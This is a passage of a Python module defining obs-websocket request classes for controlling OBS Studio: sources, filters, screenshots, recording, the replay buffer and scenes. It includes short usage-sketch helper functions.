def __init__(self, source, is_local_file=None, local_file=None, url=None, css=None, width=None, height=None, fps=None, shutdown=None, render=None):
Baserequests.__init__(self)
self.name = 'SetBrowserSourceProperties'
self.dataout['source'] = source
self.dataout['is_local_file'] = is_local_file
self.dataout['local_file'] = local_file
self.dataout['url'] = url
self.dataout['css'] = css
self.dataout['width'] = width
self.dataout['height'] = height
self.dataout['fps'] = fps
self.dataout['shutdown'] = shutdown
self.dataout['render'] = render
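# --- Usage sketch (not part of the generated protocol classes) --------------
# A browser source can be repointed at a new URL while keeping its current
# size, by reading the properties first. `ws` is an assumed connected client;
# the source name and URL below are placeholder values.
def _example_repoint_browser(ws, source="Overlay", url="https://example.com"):
    """Point a browser source at `url` without changing its dimensions."""
    props = ws.call(GetBrowserSourceProperties(source))
    return ws.call(SetBrowserSourceProperties(
        source, url=url, width=props.getWidth(), height=props.getHeight()))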
class GetSpecialSources(Baserequests):
"""Get configured special sources like Desktop Audio and Mic/Aux sources.
:Returns:
*desktop_1*
type: String (optional)
Name of the first Desktop Audio capture source.
*desktop_2*
type: String (optional)
Name of the second Desktop Audio capture source.
*mic_1*
type: String (optional)
Name of the first Mic/Aux input source.
*mic_2*
type: String (optional)
Name of the second Mic/Aux input source.
*mic_3*
type: String (optional)
Name of the third Mic/Aux input source.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSpecialSources'
self.datain['desktop-1'] = None
self.datain['desktop-2'] = None
self.datain['mic-1'] = None
self.datain['mic-2'] = None
self.datain['mic-3'] = None
def getDesktop1(self):
return self.datain['desktop-1']
def getDesktop2(self):
return self.datain['desktop-2']
def getMic1(self):
return self.datain['mic-1']
def getMic2(self):
return self.datain['mic-2']
def getMic3(self):
return self.datain['mic-3']
class GetSourceFilters(Baserequests):
"""List filters applied to a source
:Arguments:
*sourceName*
type: String
Source name
:Returns:
*filters*
type: Array<Object>
List of filters for the specified source
*filters.*.enabled*
type: Boolean
Filter status (enabled or not)
*filters.*.type*
type: String
Filter type
*filters.*.name*
type: String
Filter name
*filters.*.settings*
type: Object
Filter settings
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetSourceFilters'
self.datain['filters'] = None
self.dataout['sourceName'] = sourceName
def getFilters(self):
return self.datain['filters']
class GetSourceFilterInfo(Baserequests):
"""List filters applied to a source
:Arguments:
*sourceName*
type: String
Source name
*filterName*
type: String
Source filter name
:Returns:
*enabled*
type: Boolean
Filter status (enabled or not)
*type*
type: String
Filter type
*name*
type: String
Filter name
*settings*
type: Object
Filter settings
"""
def __init__(self, sourceName, filterName):
Baserequests.__init__(self)
self.name = 'GetSourceFilterInfo'
self.datain['enabled'] = None
self.datain['type'] = None
self.datain['name'] = None
self.datain['settings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
def getEnabled(self):
return self.datain['enabled']
def getType(self):
return self.datain['type']
def getName(self):
return self.datain['name']
def getSettings(self):
return self.datain['settings']
class AddFilterToSource(Baserequests):
"""Add a new filter to a source. Available source types along with their settings properties are available from `GetSourceTypesList`.
:Arguments:
*sourceName*
type: String
Name of the source on which the filter is added
*filterName*
type: String
Name of the new filter
*filterType*
type: String
Filter type
*filterSettings*
type: Object
Filter settings
"""
def __init__(self, sourceName, filterName, filterType, filterSettings):
Baserequests.__init__(self)
self.name = 'AddFilterToSource'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterType'] = filterType
self.dataout['filterSettings'] = filterSettings
class RemoveFilterFromSource(Baserequests):
"""Remove a filter from a source
:Arguments:
*sourceName*
type: String
Name of the source from which the specified filter is removed
*filterName*
type: String
Name of the filter to remove
"""
def __init__(self, sourceName, filterName):
Baserequests.__init__(self)
self.name = 'RemoveFilterFromSource'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
class ReorderSourceFilter(Baserequests):
"""Move a filter in the chain (absolute index positioning)
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reorder
*newIndex*
type: Integer
Desired position of the filter in the chain
"""
def __init__(self, sourceName, filterName, newIndex):
Baserequests.__init__(self)
self.name = 'ReorderSourceFilter'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['newIndex'] = newIndex
class MoveSourceFilter(Baserequests):
"""Move a filter in the chain (relative positioning)
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reorder
*movementType*
type: String
How to move the filter around in the source's filter chain. Either "up", "down", "top" or "bottom".
"""
def __init__(self, sourceName, filterName, movementType):
Baserequests.__init__(self)
self.name = 'MoveSourceFilter'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['movementType'] = movementType
class SetSourceFilterSettings(Baserequests):
"""Update settings of a filter
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reconfigure
*filterSettings*
type: Object
New settings. These will be merged to the current filter settings.
"""
def __init__(self, sourceName, filterName, filterSettings):
Baserequests.__init__(self)
self.name = 'SetSourceFilterSettings'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterSettings'] = filterSettings
class SetSourceFilterVisibility(Baserequests):
"""Change the visibility/enabled state of a filter
:Arguments:
*sourceName*
type: String
Source name
*filterName*
type: String
Source filter name
*filterEnabled*
type: Boolean
New filter state
"""
def __init__(self, sourceName, filterName, filterEnabled):
Baserequests.__init__(self)
self.name = 'SetSourceFilterVisibility'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterEnabled'] = filterEnabled
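# --- Usage sketch (not part of the generated protocol classes) --------------
# Typical filter workflow: list existing filters, add one if missing, then
# toggle its enabled state. `ws` is an assumed connected client; the filter
# name "tint", the type "color_filter" and its settings are placeholders
# (valid types come from `GetSourceTypesList`).
def _example_toggle_color_filter(ws, source_name):
    """Ensure a color filter exists on `source_name`, then flip its state."""
    existing = ws.call(GetSourceFilters(source_name)).getFilters()
    if not any(f["name"] == "tint" for f in existing):
        ws.call(AddFilterToSource(source_name, "tint", "color_filter",
                                  {"saturation": 0.5}))
    info = ws.call(GetSourceFilterInfo(source_name, "tint"))
    ws.call(SetSourceFilterVisibility(source_name, "tint",
                                      not info.getEnabled()))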
class GetAudioMonitorType(Baserequests):
"""Get the audio monitoring type of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*monitorType*
type: String
The monitor type in use. Options: `none`, `monitorOnly`, `monitorAndOutput`.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetAudioMonitorType'
self.datain['monitorType'] = None
self.dataout['sourceName'] = sourceName
def getMonitorType(self):
return self.datain['monitorType']
class SetAudioMonitorType(Baserequests):
"""Set the audio monitoring type of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
*monitorType*
type: String
The monitor type to use. Options: `none`, `monitorOnly`, `monitorAndOutput`.
"""
def __init__(self, sourceName, monitorType):
Baserequests.__init__(self)
self.name = 'SetAudioMonitorType'
self.dataout['sourceName'] = sourceName
self.dataout['monitorType'] = monitorType
class TakeSourceScreenshot(Baserequests):
"""
At least `embedPictureFormat` or `saveToFilePath` must be specified.
Clients can specify `width` and `height` parameters to receive scaled pictures. Aspect ratio is
preserved if only one of these two parameters is specified.
:Arguments:
*sourceName*
type: String (optional)
Source name. Note that, since scenes are also sources, you can also provide a scene name. If not provided, the currently active scene is used.
*embedPictureFormat*
type: String (optional)
Format of the Data URI encoded picture. Can be "png", "jpg", "jpeg" or "bmp" (or any other value supported by Qt's Image module)
*saveToFilePath*
type: String (optional)
Full file path (file extension included) where the captured image is to be saved. Can be in a format different from `pictureFormat`. Can be a relative path.
*fileFormat*
type: String (optional)
Format to save the image file as (one of the values provided in the `supported-image-export-formats` response field of `GetVersion`). If not specified, tries to guess based on file extension.
*compressionQuality*
type: int (optional)
Compression ratio between -1 and 100 to write the image with. -1 is automatic, 1 is smallest file/most compression, 100 is largest file/least compression. Varies with image type.
*width*
type: int (optional)
Screenshot width. Defaults to the source's base width.
*height*
type: int (optional)
Screenshot height. Defaults to the source's base height.
:Returns:
*sourceName*
type: String
Source name
*img*
type: String
Image Data URI (if `embedPictureFormat` was specified in the request)
*imageFile*
type: String
Absolute path to the saved image file (if `saveToFilePath` was specified in the request)
"""
def __init__(self, sourceName=None, embedPictureFormat=None, saveToFilePath=None, fileFormat=None, compressionQuality=None, width=None, height=None):
Baserequests.__init__(self)
self.name = 'TakeSourceScreenshot'
self.datain['sourceName'] = None
self.datain['img'] = None
self.datain['imageFile'] = None
self.dataout['sourceName'] = sourceName
self.dataout['embedPictureFormat'] = embedPictureFormat
self.dataout['saveToFilePath'] = saveToFilePath
self.dataout['fileFormat'] = fileFormat
self.dataout['compressionQuality'] = compressionQuality
self.dataout['width'] = width
self.dataout['height'] = height
def getSourceName(self):
return self.datain['sourceName']
def getImg(self):
return self.datain['img']
def getImageFile(self):
return self.datain['imageFile']
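# --- Usage sketch (not part of the generated protocol classes) --------------
# Requests an embedded PNG data URI of the currently active scene (no
# sourceName given) scaled to 640 px wide; aspect ratio is preserved because
# only one dimension is specified. `ws` is an assumed connected client.
def _example_grab_preview_png(ws):
    """Return a PNG data URI of the active scene, scaled to 640 px wide."""
    shot = ws.call(TakeSourceScreenshot(embedPictureFormat="png", width=640))
    return shot.getImg()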
class ListOutputs(Baserequests):
"""List existing outputs
:Returns:
*outputs*
type: Array<Output>
Outputs list
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListOutputs'
self.datain['outputs'] = None
def getOutputs(self):
return self.datain['outputs']
class GetOutputInfo(Baserequests):
"""Get information about a single output
:Arguments:
*outputName*
type: String
Output name
:Returns:
*outputInfo*
type: Output
Output info
"""
def __init__(self, outputName):
Baserequests.__init__(self)
self.name = 'GetOutputInfo'
self.datain['outputInfo'] = None
self.dataout['outputName'] = outputName
def getOutputInfo(self):
return self.datain['outputInfo']
class StartOutput(Baserequests):
"""
Note: Controlling outputs is an experimental feature of obs-websocket. Some plugins which add outputs to OBS may not function properly when they are controlled in this way.
:Arguments:
*outputName*
type: String
Output name
"""
def __init__(self, outputName):
Baserequests.__init__(self)
self.name = 'StartOutput'
self.dataout['outputName'] = outputName
class StopOutput(Baserequests):
"""
Note: Controlling outputs is an experimental feature of obs-websocket. Some plugins which add outputs to OBS may not function properly when they are controlled in this way.
:Arguments:
*outputName*
type: String
Output name
*force*
type: boolean (optional)
Force stop (default: false)
"""
def __init__(self, outputName, force=None):
Baserequests.__init__(self)
self.name = 'StopOutput'
self.dataout['outputName'] = outputName
self.dataout['force'] = force
class SetCurrentProfile(Baserequests):
"""Set the currently active profile.
:Arguments:
*profile_name*
type: String
Name of the desired profile.
"""
def __init__(self, profile_name):
Baserequests.__init__(self)
self.name = 'SetCurrentProfile'
self.dataout['profile-name'] = profile_name
class GetCurrentProfile(Baserequests):
"""Get the name of the current profile.
:Returns:
*profile_name*
type: String
Name of the currently active profile.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentProfile'
self.datain['profile-name'] = None
def getProfileName(self):
return self.datain['profile-name']
class ListProfiles(Baserequests):
"""Get a list of available profiles.
:Returns:
*profiles*
type: Array<Object>
List of available profiles.
*profiles.*.profile_name*
type: String
Profile name.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListProfiles'
self.datain['profiles'] = None
def getProfiles(self):
return self.datain['profiles']
class GetRecordingStatus(Baserequests):
"""Get current recording status.
:Returns:
*isRecording*
type: boolean
Current recording status.
*isRecordingPaused*
type: boolean
Whether the recording is paused or not.
*recordTimecode*
type: String (optional)
Time elapsed since recording started (only present if currently recording).
*recordingFilename*
type: String (optional)
Absolute path to the recording file (only present if currently recording).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetRecordingStatus'
self.datain['isRecording'] = None
self.datain['isRecordingPaused'] = None
self.datain['recordTimecode'] = None
self.datain['recordingFilename'] = None
def getIsRecording(self):
return self.datain['isRecording']
def getIsRecordingPaused(self):
return self.datain['isRecordingPaused']
def getRecordTimecode(self):
return self.datain['recordTimecode']
def getRecordingFilename(self):
return self.datain['recordingFilename']
class StartStopRecording(Baserequests):
"""Toggle recording on or off (depending on the current recording state).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopRecording'
class StartRecording(Baserequests):
"""Start recording.
Will return an `error` if recording is already active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartRecording'
class StopRecording(Baserequests):
"""Stop recording.
Will return an `error` if recording is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopRecording'
class PauseRecording(Baserequests):
"""Pause the current recording.
Returns an error if recording is not active or already paused.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'PauseRecording'
class ResumeRecording(Baserequests):
"""Resume/unpause the current recording (if paused).
Returns an error if recording is not active or not paused.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ResumeRecording'
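# --- Usage sketch (not part of the generated protocol classes) --------------
# Recording control is state-dependent: StartRecording errors when already
# recording and ResumeRecording errors when not paused, so the sketch checks
# GetRecordingStatus first. `ws` is an assumed connected client.
def _example_start_recording_if_idle(ws):
    """Start (or resume) a recording only when it is safe to do so."""
    status = ws.call(GetRecordingStatus())
    if not status.getIsRecording():
        ws.call(StartRecording())
    elif status.getIsRecordingPaused():
        ws.call(ResumeRecording())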
class SetRecordingFolder(Baserequests):
"""
Please note: if `SetRecordingFolder` is called while a recording is
in progress, the change won't be applied immediately and will be
effective on the next recording.
:Arguments:
*rec_folder*
type: String
Path of the recording folder.
"""
def __init__(self, rec_folder):
Baserequests.__init__(self)
self.name = 'SetRecordingFolder'
self.dataout['rec-folder'] = rec_folder
class GetRecordingFolder(Baserequests):
"""Get the path of the current recording folder.
:Returns:
*rec_folder*
type: String
Path of the recording folder.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetRecordingFolder'
self.datain['rec-folder'] = None
def getRecFolder(self):
return self.datain['rec-folder']
class GetReplayBufferStatus(Baserequests):
"""Get the status of the OBS replay buffer.
:Returns:
*isReplayBufferActive*
type: boolean
Current replay buffer status.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetReplayBufferStatus'
self.datain['isReplayBufferActive'] = None
def getIsReplayBufferActive(self):
return self.datain['isReplayBufferActive']
class StartStopReplayBuffer(Baserequests):
"""Toggle the Replay Buffer on/off (depending on the current state of the replay buffer).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopReplayBuffer'
class StartReplayBuffer(Baserequests):
"""Start recording into the Replay Buffer.
Will return an `error` if the Replay Buffer is already active or if the
"Save Replay Buffer" hotkey is not set in OBS' settings.
Setting this hotkey is mandatory, even when triggering saves only
through obs-websocket.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartReplayBuffer'
class StopReplayBuffer(Baserequests):
"""Stop recording into the Replay Buffer.
Will return an `error` if the Replay Buffer is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopReplayBuffer'
class SaveReplayBuffer(Baserequests):
"""Flush and save the contents of the Replay Buffer to disk. This is
basically the same as triggering the "Save Replay Buffer" hotkey.
Will return an `error` if the Replay Buffer is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'SaveReplayBuffer'
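# --- Usage sketch (not part of the generated protocol classes) --------------
# SaveReplayBuffer only works while the Replay Buffer is active, so the sketch
# starts it on demand first. Remember that the "Save Replay Buffer" hotkey
# must be configured in OBS for this to succeed. `ws` is an assumed connected
# client.
def _example_save_replay(ws):
    """Make sure the Replay Buffer is running, then flush it to disk."""
    if not ws.call(GetReplayBufferStatus()).getIsReplayBufferActive():
        ws.call(StartReplayBuffer())
    ws.call(SaveReplayBuffer())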
class SetCurrentSceneCollection(Baserequests):
"""Change the active scene collection.
:Arguments:
*sc_name*
type: String
Name of the desired scene collection.
"""
def __init__(self, sc_name):
Baserequests.__init__(self)
self.name = 'SetCurrentSceneCollection'
self.dataout['sc-name'] = sc_name
class GetCurrentSceneCollection(Baserequests):
"""Get the name of the current scene collection.
:Returns:
*sc_name*
type: String
Name of the currently active scene collection.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentSceneCollection'
self.datain['sc-name'] = None
def getScName(self):
return self.datain['sc-name']
class ListSceneCollections(Baserequests):
"""List available scene collections
:Returns:
*scene_collections*
type: Array<String>
Scene collections list
*scene_collections.*.sc_name*
type: String
Scene collection name
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListSceneCollections'
self.datain['scene-collections'] = None
def getSceneCollections(self):
return self.datain['scene-collections']
class GetSceneItemList(Baserequests):
"""Get a list of all scene items in a scene.
:Arguments:
*sceneName*
type: String (optional)
Name of the scene to get the list of scene items from. Defaults to the current scene if not specified.
:Returns:
*sceneName*
type: String
Name of the requested (or current) scene
*sceneItems*
type: Array<Object>
Array of scene items
*sceneItems.*.itemId*
type: int
Unique item id of the source item
*sceneItems.*.sourceKind*
type: String
ID of the scene item's source. For example `vlc_source` or `image_source`
*sceneItems.*.sourceName*
type: String
Name of the scene item's source
*sceneItems.*.sourceType*
type: String
Type of the scene item's source. Either `input`, `group`, or `scene`
"""
def __init__(self, sceneName=None):
Baserequests.__init__(self)
self.name = 'GetSceneItemList'
self.datain['sceneName'] = None
self.datain['sceneItems'] = None
self.dataout['sceneName'] = sceneName
def getSceneName(self):
return self.datain['sceneName']
def getSceneItems(self):
return self.datain['sceneItems']
class GetSceneItemProperties(Baserequests):
"""Gets the scene specific properties of the specified source item.
Coordinates are relative to the item's parent (the scene or group it belongs to).
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
:Returns:
*name*
type: String
Scene Item name.
*itemId*
type: int
Scene Item ID.
*position.x*
type: double
The x position of the source from the left.
*position.y*
type: double
The y position of the source from the top.
*position.alignment*
type: int
The point on the source that the item is manipulated from. The sum of 1=Left or 2=Right, and 4=Top or 8=Bottom, or omit to center on that axis.
*rotation*
type: double
The clockwise rotation of the item in degrees around the point of alignment.
*scale.x*
type: double
The x-scale factor of the source.
*scale.y*
type: double
The y-scale factor of the source.
*crop.top*
type: int
The number of pixels cropped off the top of the source before scaling.
*crop.right*
type: int
The number of pixels cropped off the right of the source before scaling.
*crop.bottom*
type: int
The number of pixels cropped off the bottom of the source before scaling.
*crop.left*
type: int
The number of pixels cropped off the left of the source before scaling.
*visible*
type: bool
If the source is visible.
*muted*
type: bool
If the source is muted.
*locked*
type: bool
If the source's transform is locked.
*bounds.type*
type: String
Type of bounding box. Can be "OBS_BOUNDS_STRETCH", "OBS_BOUNDS_SCALE_INNER", "OBS_BOUNDS_SCALE_OUTER", "OBS_BOUNDS_SCALE_TO_WIDTH", "OBS_BOUNDS_SCALE_TO_HEIGHT", "OBS_BOUNDS_MAX_ONLY" or "OBS_BOUNDS_NONE".
*bounds.alignment*
type: int
Alignment of the bounding box.
*bounds.x*
type: double
Width of the bounding box.
*bounds.y*
type: double
Height of the bounding box.
*sourceWidth*
type: int
Base width (without scaling) of the source
*sourceHeight*
type: int
Base height (without scaling) of the source
*width*
type: double
Scene item width (base source width multiplied by the horizontal scaling factor)
*height*
type: double
Scene item height (base source height multiplied by the vertical scaling factor)
*parentGroupName*
type: String (optional)
Name of the item's parent (if this item belongs to a group)
*groupChildren*
type: Array<SceneItemTransform> (optional)
List of children (if this item is a group)
"""
def __init__(self, item, scene_name=None):
Baserequests.__init__(self)
self.name = 'GetSceneItemProperties'
self.datain['name'] = None
self.datain['itemId'] = None
self.datain['position'] = None
self.datain['rotation'] = None
self.datain['scale'] = None
self.datain['crop'] = None
self.datain['visible'] = None
self.datain['muted'] = None
self.datain['locked'] = None
self.datain['bounds'] = None
self.datain['sourceWidth'] = None
self.datain['sourceHeight'] = None
self.datain['width'] = None
self.datain['height'] = None
self.datain['parentGroupName'] = None
self.datain['groupChildren'] = None
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
def getName(self):
return self.datain['name']
def getItemId(self):
return self.datain['itemId']
def getPosition(self):
return self.datain['position']
def getRotation(self):
return self.datain['rotation']
def getScale(self):
return self.datain['scale']
def getCrop(self):
return self.datain['crop']
def getVisible(self):
return self.datain['visible']
def getMuted(self):
return self.datain['muted']
def getLocked(self):
return self.datain['locked']
def getBounds(self):
return self.datain['bounds']
def getSourceWidth(self):
return self.datain['sourceWidth']
def getSourceHeight(self):
return self.datain['sourceHeight']
def getWidth(self):
return self.datain['width']
def getHeight(self):
return self.datain['height']
def getParentGroupName(self):
return self.datain['parentGroupName']
def getGroupChildren(self):
return self.datain['groupChildren']
class SetSceneItemProperties(Baserequests):
"""Sets the scene specific properties of a source. Unspecified properties will remain unchanged.
Coordinates are relative to the item's parent (the scene or group it belongs to).
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the source item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
*position.x*
type: double (optional)
The new x position of the source.
*position.y*
type: double (optional)
The new y position of the source.
*position.alignment*
type: int (optional)
The new alignment of the source.
*rotation*
type: double (optional)
The new clockwise rotation of the item in degrees.
*scale.x*
type: double (optional)
The new x scale of the item.
*scale.y*
type: double (optional)
The new y scale of the item.
*crop.top*
type: int (optional)
The new amount of pixels cropped off the top of the source before scaling.
*crop.bottom*
type: int (optional)
The new amount of pixels cropped off the bottom of the source before scaling.
*crop.left*
type: int (optional)
The new amount of pixels cropped off the left of the source before scaling.
*crop.right*
type: int (optional)
The new amount of pixels cropped off the right of the source before scaling.
*visible*
type: bool (optional)
The new visibility of the source. 'true' shows source, 'false' hides source.
*locked*
type: bool (optional)
The new locked status of the source. 'true' keeps it in its current position, 'false' allows movement.
*bounds.type*
type: String (optional)
The new bounds type of the source. Can be "OBS_BOUNDS_STRETCH", "OBS_BOUNDS_SCALE_INNER", "OBS_BOUNDS_SCALE_OUTER", "OBS_BOUNDS_SCALE_TO_WIDTH", "OBS_BOUNDS_SCALE_TO_HEIGHT", "OBS_BOUNDS_MAX_ONLY" or "OBS_BOUNDS_NONE".
*bounds.alignment*
type: int (optional)
The new alignment of the bounding box. (0-2, 4-6, 8-10)
*bounds.x*
type: double (optional)
The new width of the bounding box.
*bounds.y*
type: double (optional)
The new height of the bounding box.
"""
def __init__(self, item, scene_name=None, position=None, rotation=None, scale=None, crop=None, visible=None, locked=None, bounds=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemProperties'
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
self.dataout['position'] = position
self.dataout['rotation'] = rotation
self.dataout['scale'] = scale
self.dataout['crop'] = crop
self.dataout['visible'] = visible
self.dataout['locked'] = locked
self.dataout['bounds'] = bounds
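# --- Usage sketch (not part of the generated protocol classes) --------------
# GetSceneItemProperties/SetSceneItemProperties accept the item either as a
# plain name or as a {"name"/"id"} object; nested values such as position and
# scale travel as dicts. `ws` is an assumed connected client and the item name
# "Webcam" is a placeholder.
def _example_nudge_item(ws, item="Webcam", dx=10.0, dy=0.0):
    """Move a scene item by (dx, dy) pixels relative to its current position."""
    pos = ws.call(GetSceneItemProperties(item)).getPosition()
    return ws.call(SetSceneItemProperties(
        item, position={"x": pos["x"] + dx, "y": pos["y"] + dy}))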
class ResetSceneItem(Baserequests):
"""Reset a scene item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
"""
def __init__(self, item, scene_name=None):
Baserequests.__init__(self)
self.name = 'ResetSceneItem'
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
class SetSceneItemRender(Baserequests):
"""Show or hide a specified source item in a specified scene.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the currently active scene.
*source*
type: String
Scene Item name.
*render*
type: boolean
true = shown ; false = hidden
"""
def __init__(self, source, render, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemRender'
self.dataout['source'] = source
self.dataout['render'] = render
self.dataout['scene-name'] = scene_name
class SetSceneItemPosition(Baserequests):
"""Sets the coordinates of a specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*x*
type: double
X coordinate.
*y*
type: double
Y coordinate.
"""
def __init__(self, item, x, y, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemPosition'
self.dataout['item'] = item
self.dataout['x'] = x
self.dataout['y'] = y
self.dataout['scene-name'] = scene_name
class SetSceneItemTransform(Baserequests):
"""Set the transform of the specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*x_scale*
type: double
Width scale factor.
*y_scale*
type: double
Height scale factor.
*rotation*
type: double
Source item rotation (in degrees).
"""
def __init__(self, item, x_scale, y_scale, rotation, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemTransform'
self.dataout['item'] = item
self.dataout['x-scale'] = x_scale
self.dataout['y-scale'] = y_scale
self.dataout['rotation'] = rotation
self.dataout['scene-name'] = scene_name
class SetSceneItemCrop(Baserequests):
"""Sets the crop coordinates of the specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*top*
type: int
Pixel position of the top of the source item.
*bottom*
type: int
Pixel position of the bottom of the source item.
*left*
type: int
Pixel position of the left of the source item.
*right*
type: int
Pixel position of the right of the source item.
"""
def __init__(self, item, top, bottom, left, right, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemCrop'
self.dataout['item'] = item
self.dataout['top'] = top
self.dataout['bottom'] = bottom
self.dataout['left'] = left
self.dataout['right'] = right
self.dataout['scene-name'] = scene_name
class DeleteSceneItem(Baserequests):
"""Deletes a scene item.
:Arguments:
*scene*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: Object
Scene item to delete (required)
*item.name*
type: String
Scene Item name (prefer `id`, including both is acceptable).
*item.id*
type: int
Scene Item ID.
"""
def __init__(self, item, scene=None):
Baserequests.__init__(self)
self.name = 'DeleteSceneItem'
self.dataout['item'] = item
self.dataout['scene'] = scene
class AddSceneItem(Baserequests):
"""Creates a scene item in a scene. In other words, this is how you add a source into a scene.
:Arguments:
*sceneName*
type: String
Name of the scene to create the scene item in
*sourceName*
type: String
Name of the source to be added
*setVisible*
type: boolean
Whether to make the scene item visible on creation. Default `true`.
:Returns:
*itemId*
type: int
Numerical ID of the created scene item
"""
def __init__(self, sceneName, sourceName, setVisible):
Baserequests.__init__(self)
self.name = 'AddSceneItem'
self.datain['itemId'] = None
self.dataout['sceneName'] = sceneName
self.dataout['sourceName'] = sourceName
self.dataout['setVisible'] = setVisible
def getItemId(self):
return self.datain['itemId']
class DuplicateSceneItem(Baserequests):
"""Duplicates a scene item.
:Arguments:
*fromScene*
type: String (optional)
Name of the scene to copy the item from. Defaults to the current scene.
*toScene*
type: String (optional)
Name of the scene to create the item in. Defaults to the current scene.
*item*
type: Object
Scene Item to duplicate from the source scene (required)
*item.name*
type: String
Scene Item name (prefer `id`, including both is acceptable).
*item.id*
type: int
Scene Item ID.
:Returns:
*scene*
type: String
Name of the scene where the new item was created
*item*
type: Object
New item info
*item.id*
type: int
New item ID
*item.name*
type: String
New item name
"""
def __init__(self, item, fromScene=None, toScene=None):
Baserequests.__init__(self)
self.name = 'DuplicateSceneItem'
self.datain['scene'] = None
self.datain['item'] = None
self.dataout['item'] = item
self.dataout['fromScene'] = fromScene
self.dataout['toScene'] = toScene
def getScene(self):
return self.datain['scene']
def getItem(self):
return self.datain['item']
class SetCurrentScene(Baserequests):
"""Switch to the specified scene.
:Arguments:
*scene_name*
type: String
Name of the scene to switch to.
"""
def __init__(self, scene_name):
Baserequests.__init__(self)
self.name = 'SetCurrentScene'
self.dataout['scene-name'] = scene_name
class GetCurrentScene(Baserequests):
"""Get the current scene's name and source items.
:Returns:
*name*
type: String
Name of the currently active scene.
*sources*
type: Array<SceneItem>
Ordered list of the current scene's source items.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentScene'
self.datain['name'] = None
self.datain['sources'] = None
def getName(self):
return self.datain['name']
def getSources(self):
return self.datain['sources']
class GetSceneList(Baserequests):
"""Get a list of scenes in the currently active profile.
:Returns:
*current_scene*
type: String
Name of the currently active scene.
*scenes*
type: Array<Scene>
Ordered list of the current profile's scenes (See [GetCurrentScene](#getcurrentscene) for more information).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSceneList'
self.datain['current-scene'] = None
self.datain['scenes'] = None
def getCurrentScene(self):
return self.datain['current-scene']
def getScenes(self):
return self.datain['scenes']
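# --- Usage sketch (not part of the generated protocol classes) --------------
# GetSceneList returns the active scene name plus every scene object, which is
# enough to implement a simple "next scene" rotation with SetCurrentScene.
# `ws` is an assumed connected client.
def _example_cycle_to_next_scene(ws):
    """Switch OBS to the scene that follows the current one in the list."""
    listing = ws.call(GetSceneList())
    names = [s["name"] for s in listing.getScenes()]
    current = listing.getCurrentScene()
    ws.call(SetCurrentScene(names[(names.index(current) + 1) % len(names)]))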
class CreateScene(Baserequests):
"""Create a new scene scene.
:Arguments:
